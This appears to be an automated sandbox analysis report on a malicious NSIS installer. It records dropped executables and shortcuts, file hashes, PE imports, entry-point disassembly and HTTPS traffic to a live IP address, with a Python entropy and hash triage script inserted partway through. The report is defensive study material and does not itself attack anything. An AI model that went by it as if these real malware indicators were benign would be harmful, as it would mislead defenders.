                                                                      SSDEEP:48:iEnd10UW5SlYmi0arFyRRqQeQpfS/8HHtgGVOe7:hdk1miHrrMGMNjN7
                                                                      MD5:65AFA39B0E2935FD0F0EAAE9934A09EC
                                                                      SHA1:6D7C896C9825809046862695877EB88C3248C6F8
                                                                      SHA-256:75B6002232106FA6BA35B5554270461E0431D11EEA7D67ADBAD2651D19790A20
                                                                      SHA-512:732A14FCAB8E7845B239930FDC3CC1BEF2B08AB06B740D6931CDC2F352C7505BD5E26F6DB820771089664BDD2AE9347B20E1BB769ABB5C60A472B1240D35DF6A
                                                                      Malicious:false
                                                                      Preview:............E.N....k.1....P..8.,.-.........:....]h........\.S.D6.....p..o...............".......4.a..R.h....3....a.O....T...S:..cK....-|..........u..............f...T..........T...o...A..G.T..p....u~.......s.5I.......F.S....*...........`.......qD....m.....:...(.....Q..Z..........g.......eN.D..............C.........Xh*........U.w..j.........#..........[........<Q...o8...........X...p@........jw.I........y..J..0......."q.b..y..c..l............K................W........._..*...4.,..x.......^...v...........J...........}.N...7.y...o^..........V...Y..S...................................2....4........D.c..C......&rU.....@..}........................^.................w....!......;......O......0.k_......_..".....m.........;...........I.......c....r....................#.......[.j.....q|...8..BB......V.....4..\>....."...X.u....*.P....................7.....=......A.....0...........@.....[..........8......l+.........F....k.L...+..........[..E.......3............'.4.......B...u..........?..e.M...
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                      Category:dropped
                                                                      Size (bytes):562306
                                                                      Entropy (8bit):7.466005196525454
                                                                      Encrypted:false
                                                                      SSDEEP:12288:8stfWr2zXogHMSwOdJ1JUTrNuVwik2Mx/DvMAM++:8st+r2zXZ/dJyrNuuik2yDc++
                                                                      MD5:4621FEA50E1982E6F753EFE7D1BE2B35
                                                                      SHA1:46072B07BFA96583ED03149A04411CBCF04EADF9
                                                                      SHA-256:6B2874507FC8B7782D11F202840850BA6EDD8BEFBB8C163C4D53775FB8D20603
                                                                      SHA-512:301E380D9E207CAA7E994B251E2018207851A32F0C1850B3DE669742C9D640D5254640D972E0143BC99E8CB2E3728BB7878814E66498928FF777D26C9BD206F5
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                      • Antivirus: Virustotal, Detection: 61%, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L...<.Oa.................f...|.......3............@.......................................@.................................D........................................................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...8U...........~..............@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:false
                                                                      Preview:[ZoneTransfer]....ZoneId=0
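The records above all carry an "Entropy (8bit)" value and a set of hashes, and the 26-byte file just listed is a Zone.Identifier alternate data stream that PowerShell wrote next to the dropped PE with ZoneId=0 (Local Machine), i.e. without the Internet zone marker that SmartScreen and Protected View key on. The example below, added here and not part of the report, reproduces the entropy metric so the report values can be checked against captured files, hashes the bytes, classifies the record kinds seen above by magic bytes, and parses the zone id. `ZONE_IDENTIFIER` is a reconstruction from the preview, assuming that the four dots between the two lines are a CRLF pair and a blank line (the preview renders CRLF as ".."); the `HIGH_ENTROPY` threshold is a triage assumption of this example, not the sandbox's own rule.

```python
import hashlib
import math
from collections import Counter

# Reconstructed from the 26-byte preview "[ZoneTransfer]....ZoneId=0";
# the CRLF CRLF in the middle is an assumption based on the dot rendering.
ZONE_IDENTIFIER = b"[ZoneTransfer]\r\n\r\nZoneId=0"

# Hypothetical triage threshold (assumption): above this, bytes are more
# likely compressed or encrypted than plain code or text.
HIGH_ENTROPY = 7.2

# Zone ids written by the Attachment Execution Service.
ZONES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites",
         3: "Internet", 4: "Restricted Sites"}


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte, the 'Entropy (8bit)' column:
    0.0 for one repeated byte value, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def hashes(data: bytes) -> dict:
    """Upper-case hex digests in the same three algorithms the records list."""
    return {
        "md5": hashlib.md5(data).hexdigest().upper(),
        "sha1": hashlib.sha1(data).hexdigest().upper(),
        "sha256": hashlib.sha256(data).hexdigest().upper(),
    }


def identify(data: bytes) -> str:
    """Coarse type from magic bytes, enough to separate the record kinds
    seen in this report."""
    if data.startswith(b"MZ"):
        return "PE"
    if data.startswith(b"SQLite format 3\x00"):
        return "SQLite 3.x database"
    if data.startswith(b"[ZoneTransfer]"):
        return "Zone.Identifier ADS"
    if data.startswith(b"PSMODULECACHE"):
        return "PowerShell module analysis cache"
    return "data"


def zone_id(data: bytes):
    """ZoneId from a Zone.Identifier stream, or None if absent."""
    for line in data.decode("ascii", "replace").splitlines():
        if line.startswith("ZoneId="):
            return int(line.split("=", 1)[1])
    return None


def triage(data: bytes) -> dict:
    """One record in the style of the report's dropped-file entries."""
    ent = shannon_entropy(data)
    info = {"type": identify(data), "size": len(data), "entropy": ent,
            "likely_packed_or_encrypted": ent >= HIGH_ENTROPY}
    info.update(hashes(data))
    if info["type"] == "Zone.Identifier ADS":
        zid = zone_id(data)
        info["zone_id"] = zid
        info["zone_name"] = ZONES.get(zid, "unknown")
        # MotW-based checks trigger on Internet / Restricted Sites only.
        info["internet_zone"] = zid in (3, 4)
    return info


if __name__ == "__main__":
    for key, value in triage(ZONE_IDENTIFIER).items():
        print(f"{key}: {value}")
```

Comparing the MD5 this prints for `ZONE_IDENTIFIER` with the MD5 in the record above confirms or refutes the CRLF reconstruction; the entropy alone cannot, because it depends only on byte frequencies, not their order.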
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):6656
                                                                      Entropy (8bit):5.1793678932213725
                                                                      Encrypted:false
                                                                      SSDEEP:96:AOBtEB2flLkatAthPZJoi9jpfW/er6cBbcB/NFyVOHd0+uHwEX:AhB2flXAVJtjf6cBbcB/N8Ved0PZ
                                                                      MD5:5AA38904ACDCC21A2FB8A1D30A72D92F
                                                                      SHA1:A9CE7D1456698921791DB91347DBA0489918D70C
                                                                      SHA-256:10675F13ABAEE592F14382349AA35D82FB52AAB4E27EEF61D0C83DEC1F6B73DA
                                                                      SHA-512:F04740DA561D7CD0DEA5E839C9E1C339D4A3E63944D3566C94C921A3D170A69918A32DFF3F3B43F13D55CC25A2DBB4C21104F062C324308AC5104179766402A3
                                                                      Malicious:true
                                                                      Antivirus:
                                                                       • Antivirus: ReversingLabs, Detection: 0%
                                                                       • Antivirus: Virustotal, Detection: 0%
                                                                       Joe Sandbox View:
                                                                       • Filename: , Detection: malicious
                                                                       • Filename: Arkopa Ahsap Panel San. A.S.#3152.exe, Detection: malicious
                                                                       • Filename: Arkopa Ahsap Panel San. A.S.#3152.exe, Detection: malicious
                                                                       • Filename: Arkopa Ahsap Panel San. A.S.#3152.exe, Detection: malicious
                                                                       • Filename: Arkopa Ahsap Panel San. A.S.#3152.exe, Detection: malicious
                                                                       • Filename: GR&_T._Ekstralam_Proorma_1&_7687429--&.exe, Detection: malicious
                                                                       • Filename: GR&_T._Ekstralam_Proorma_1&_7687429--&.exe, Detection: malicious
                                                                       • Filename: maalesteder.exe, Detection: malicious
                                                                       • Filename: maalesteder.exe, Detection: malicious
                                                                       • Filename: RFQ_Quote.PDF.exe, Detection: malicious
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........PE..L.....Oa...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
                                                                      File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                                      Category:dropped
                                                                      Size (bytes):886
                                                                      Entropy (8bit):3.285899309149801
                                                                      Encrypted:false
                                                                      SSDEEP:12:8wl0hsXyllEzKi+qA6cCl4hIOKz7Fzl4hIO7j7Q1LgXNE7/v4t2YZ/elFlSJm:8y2CzKt6cm7OkJ7O7Q5ye/lqy
                                                                      MD5:26E0603817CFFA30B5A0884C823B7BC8
                                                                      SHA1:1B89699F708C9FDC29089044CE0D01068DC3A9C2
                                                                      SHA-256:D021F88E3B87F6D7A5D971F4758A75BDEDC113E172E3B5406C11CF6243DDA433
                                                                      SHA-512:8638979543F0B4004A206450E1B147A9B38D4C2CFBCD27ACDC70BDA1810C07D3064B4AA29B1C52197572E809DC4105392C283FD17E3ADCD17D411B5DCEC23696
                                                                      Malicious:false
                                                                      Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................b.r.o.k.....P.1...........Music.<............................................M.u.s.i.c.....~.2...........forbindingers.Bam132..Z............................................f.o.r.b.i.n.d.i.n.g.e.r.s...B.a.m.1.3.2...$...+.....\.....\.U.s.e.r.s.\.b.r.o.k.\.M.u.s.i.c.\.f.o.r.b.i.n.d.i.n.g.e.r.s...B.a.m.1.3.2.5.C.:.\.U.s.e.r.s.\.b.r.o.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.M.o.v.i.e.d.o.m.2.3.0.\.G.r.n.n.e.n.d.e.........................q..K.m.H..B" ..C................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                      Entropy (8bit):7.466005196525454
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
                                                                      File size:562'306 bytes
                                                                      MD5:4621fea50e1982e6f753efe7d1be2b35
                                                                      SHA1:46072b07bfa96583ed03149a04411cbcf04eadf9
                                                                      SHA256:6b2874507fc8b7782d11f202840850ba6edd8befbb8c163c4d53775fb8d20603
                                                                      SHA512:301e380d9e207caa7e994b251e2018207851a32f0c1850b3de669742c9d640d5254640d972e0143bc99e8cb2e3728bb7878814e66498928ff777d26c9bd206f5
                                                                      SSDEEP:12288:8stfWr2zXogHMSwOdJ1JUTrNuVwik2Mx/DvMAM++:8st+r2zXZ/dJyrNuuik2yDc++
                                                                      TLSH:17C4C0612277DC63E38483B44155EABD8E7BEE8A1931DA3716F4ED5BB518F32381A301
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...<.Oa.................f...|.......3............@
                                                                      Icon Hash:7b33527236162635
                                                                      Entrypoint:0x4033b3
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x614F9B3C [Sat Sep 25 21:57:16 2021 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:5f0c714c36e6cc016b3a1f4bc86559e4
                                                                      Instruction
                                                                      push ebp
                                                                      mov ebp, esp
                                                                      sub esp, 00000220h
                                                                      push esi
                                                                      push edi
                                                                      xor edi, edi
                                                                      push 00008001h
                                                                      mov dword ptr [ebp-10h], edi
                                                                      mov dword ptr [ebp-04h], 0040A198h
                                                                      mov dword ptr [ebp-08h], edi
                                                                      mov byte ptr [ebp-0Ch], 00000020h
                                                                      call dword ptr [004080B8h]
                                                                      mov esi, dword ptr [004080BCh]
                                                                      lea eax, dword ptr [ebp-000000C0h]
                                                                      push eax
                                                                      mov dword ptr [ebp-000000ACh], edi
                                                                      mov dword ptr [ebp-2Ch], edi
                                                                      mov dword ptr [ebp-28h], edi
                                                                      mov dword ptr [ebp-000000C0h], 0000009Ch
                                                                      call esi
                                                                      test eax, eax
                                                                      jne 00007F9024EE4D11h
                                                                      lea eax, dword ptr [ebp-000000C0h]
                                                                      mov dword ptr [ebp-000000C0h], 00000094h
                                                                      push eax
                                                                      call esi
                                                                      cmp dword ptr [ebp-000000B0h], 02h
                                                                      jne 00007F9024EE4CFCh
                                                                      movsx cx, byte ptr [ebp-0000009Fh]
                                                                      mov al, byte ptr [ebp-000000ACh]
                                                                      sub ecx, 30h
                                                                      sub al, 53h
                                                                      mov byte ptr [ebp-26h], 00000004h
                                                                      neg al
                                                                      sbb eax, eax
                                                                      not eax
                                                                      and eax, ecx
                                                                      mov word ptr [ebp-2Ch], ax
                                                                      cmp dword ptr [ebp-000000B0h], 02h
                                                                      jnc 00007F9024EE4CF4h
                                                                      and byte ptr [ebp-26h], 00000000h
                                                                      cmp byte ptr [ebp-000000ABh], 00000041h
                                                                      jl 00007F9024EE4CE3h
                                                                      movsx ax, byte ptr [ebp-000000ABh]
                                                                      sub eax, 40h
                                                                      mov word ptr [ebp-2Ch], ax
                                                                      jmp 00007F9024EE4CD6h
                                                                      mov word ptr [ebp-2Ch], di
                                                                      cmp dword ptr [ebp-000000BCh], 0Ah
                                                                      jnc 00007F9024EE4CDAh
                                                                      and word ptr [ebp+00000000h], 0000h
                                                                      Programming Language:
                                                                      • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8544 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3e000 | 0x304b8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x29c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x65ba | 0x6600 | 6e968f149f564f58d6d9c6be0d4d9835 | False | 0.677734375 | data | 6.4837786344312045 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1382 | 0x1400 | b482f3e369cbdfbb46b476304c2b23c4 | False | 0.4626953125 | data | 5.262676635269928 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x25538 | 0x600 | c17387307d09c631d1913f4cbee5a09b | False | 0.462890625 | data | 4.130139712023956 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x30000 | 0xe000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3e000 | 0x304b8 | 0x30600 | cecd40c9c56b9cb51a37ea4fc2667350 | False | 0.41400698481912146 | data | 5.781817826756975 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3e388 | 0x10a00 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.265140390037594
RT_ICON | 0x4ed88 | 0x9600 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.3025260416666667
RT_ICON | 0x58388 | 0x7600 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9919557733050848
RT_ICON | 0x5f988 | 0x5600 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.32262899709302323
RT_ICON | 0x64f88 | 0x4400 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.35696231617647056
RT_ICON | 0x69388 | 0x2600 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.3853824013157895
RT_ICON | 0x6b988 | 0x1200 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.4479166666666667
RT_ICON | 0x6cb88 | 0xa00 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.51640625
RT_ICON | 0x6d588 | 0x600 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.4479166666666667
RT_DIALOG | 0x6db88 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x6dc88 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x6dda8 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x6de70 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x6ded0 | 0x84 | data | English | United States | 0.8939393939393939
RT_VERSION | 0x6df58 | 0x21c | data | English | United States | 0.524074074074074
RT_MANIFEST | 0x6e178 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
ADVAPI32.dll | RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll | SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll | IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, SetWindowPos, SetCursor, GetSysColor, SetClassLongA, GetWindowLongA, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersionExA, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 25, 2024 19:25:24.386379957 CEST | 49706 | 443 | 192.168.2.10 | 195.252.110.253
Apr 25, 2024 19:25:24.386415958 CEST | 443 | 49706 | 195.252.110.253 | 192.168.2.10
Apr 25, 2024 19:25:24.386852026 CEST | 49706 | 443 | 192.168.2.10 | 195.252.110.253
Apr 25, 2024 19:25:24.399139881 CEST | 49706 | 443 | 192.168.2.10 | 195.252.110.253
Apr 25, 2024 19:25:24.399158955 CEST | 443 | 49706 | 195.252.110.253 | 192.168.2.10
Apr 25, 2024 19:25:24.877459049 CEST | 443 | 49706 | 195.252.110.253 | 192.168.2.10
Apr 25, 2024 19:25:24.877583981 CEST | 49706 | 443 | 192.168.2.10 | 195.252.110.253
Apr 25, 2024 19:25:24.938307047 CEST | 49706 | 443 | 192.168.2.10 | 195.252.110.253
Apr 25, 2024 19:25:24.938338995 CEST | 443 | 49706 | 195.252.110.253 | 192.168.2.10
Apr 25, 2024 19:25:24.938694000 CEST | 443 | 49706 | 195.252.110.253 | 192.168.2.10
Apr 25, 2024 19:25:24.938776970 CEST | 49706 | 443 | 192.168.2.10 | 195.252.110.253
Apr 25, 2024 19:25:24.941941023 CEST | 49706 | 443 | 192.168.2.10 | 195.252.110.253
Apr 25, 2024 19:25:24.984122992 CEST | 443 | 49706 | 195.252.110.253 | 192.168.2.10
Apr 25, 2024 19:25:25.589771032 CEST | 443 | 49706 | 195.252.110.253 | 192.168.2.10
Apr 25, 2024 19:25:25.589797974 CEST | 443 | 49706 | 195.252.110.253 | 192.168.2.10
Apr 25, 2024 19:25:25.589844942 CEST | 443 | 49706 | 195.252.110.253 | 192.168.2.10
Apr 25, 2024 19:25:25.589864016 CEST | 49706 | 443 | 192.168.2.10 | 195.252.110.253
Apr 25, 2024 19:25:25.589890003 CEST | 443 | 49706 | 195.252.110.253 | 192.168.2.10
Apr 25, 2024 19:25:25.589919090 CEST | 49706 | 443 | 192.168.2.10 | 195.252.110.253
Apr 25, 2024 19:25:25.589993000 CEST | 49706 | 443 | 192.168.2.10 | 195.252.110.253
Apr 25, 2024 19:25:25.590032101 CEST | 443 | 49706 | 195.252.110.253 | 192.168.2.10
Apr 25, 2024 19:25:25.590050936 CEST | 443 | 49706 | 195.252.110.253 | 192.168.2.10
Apr 25, 2024 19:25:25.590120077 CEST | 49706 | 443 | 192.168.2.10 | 195.252.110.253
Apr 25, 2024 19:25:25.590126991 CEST | 443 | 49706 | 195.252.110.253 | 192.168.2.10
Apr 25, 2024 19:25:25.590164900 CEST | 49706 | 443 | 192.168.2.10 | 195.252.110.253
Apr 25, 2024 19:25:25.825278044 CEST | 443 | 49706 | 195.252.110.253 | 192.168.2.10
Apr 25, 2024 19:25:25.825293064 CEST | 443 | 49706 | 195.252.110.253 | 192.168.2.10
Apr 25, 2024 19:25:25.825345993 CEST | 443 | 49706 | 195.252.110.253 | 192.168.2.10
Apr 25, 2024 19:25:25.825378895 CEST | 49706 | 443 | 192.168.2.10 | 195.252.110.253
Apr 25, 2024 19:25:25.825407982 CEST | 443 | 49706 | 195.252.110.253 | 192.168.2.10
Apr 25, 2024 19:25:25.825436115 CEST | 49706 | 443 | 192.168.2.10 | 195.252.110.253
Apr 25, 2024 19:25:25.825455904 CEST | 49706 | 443 | 192.168.2.10 | 195.252.110.253
Apr 25, 2024 19:25:25.825558901 CEST | 443 | 49706 | 195.252.110.253 | 192.168.2.10
Apr 25, 2024 19:25:25.825581074 CEST | 443 | 49706 | 195.252.110.253 | 192.168.2.10
Apr 25, 2024 19:25:25.825614929 CEST | 49706 | 443 | 192.168.2.10 | 195.252.110.253
Apr 25, 2024 19:25:25.825619936 CEST | 443 | 49706 | 195.252.110.253 | 192.168.2.10
Apr 25, 2024 19:25:25.825649023 CEST | 49706 | 443 | 192.168.2.10 | 195.252.110.253
Apr 25, 2024 19:25:25.825665951 CEST | 49706 | 443 | 192.168.2.10 | 195.252.110.253
Apr 25, 2024 19:25:25.826040983 CEST | 443 | 49706 | 195.252.110.253 | 192.168.2.10
Apr 25, 2024 19:25:25.826055050 CEST | 443 | 49706 | 195.252.110.253 | 192.168.2.10
Apr 25, 2024 19:25:25.826108932 CEST | 49706 | 443 | 192.168.2.10 | 195.252.110.253
                                                                      Apr 25, 2024 19:25:25.826116085 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.826152086 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:25.855964899 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.855993032 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.856064081 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:25.856086016 CEST44349706195.252.110.253192.168.2.10
                                                                      Apr 25, 2024 19:25:25.856143951 CEST49706443192.168.2.10195.252.110.253
                                                                      Apr 25, 2024 19:25:26.060034990 CEST44349706195.252.110.253192.168.2.10
